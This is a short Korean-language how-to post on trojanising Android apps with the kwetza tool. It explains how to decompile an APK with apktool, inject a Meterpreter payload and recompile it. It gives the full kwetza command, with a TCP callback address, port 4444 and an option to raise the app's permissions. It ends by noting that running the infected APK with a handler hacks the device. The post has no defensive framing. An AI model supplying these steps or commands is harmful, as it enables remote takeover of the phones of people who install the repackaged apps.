안드로이드 앱에 악성코드 넣기 [kwetza]

https://github.com/sensepost/kwetza

GitHub - sensepost/kwetza: Python script to inject existing Android applications with a Meterpreter payload.

kwetza와 함께 apktool도 필요합니다.
apktool은 apk 파일을 디컴파일 및 컴파일 해주는 모듈인데
원리는 apktool 디컴파일로 apk를 까서 풀어놓은 뒤
그 파일 안에 악성코드를 집어넣은 뒤
다시 컴파일하는 방식입니다.

명령 - 앱파일을 kwetza 폴더 안에 넣은뒤
python kwetza.py 앱명.apk tcp 192.168.0.0 4444 yes[퍼미션 앱권한 설정] AssistActivity
퍼미션 yes시 기존 앱파일 권한보다 높은 권한을 얻는다.
완성된 감염 apk파일을 안드로이드 핸들러와 실행하면 해킹이 된다.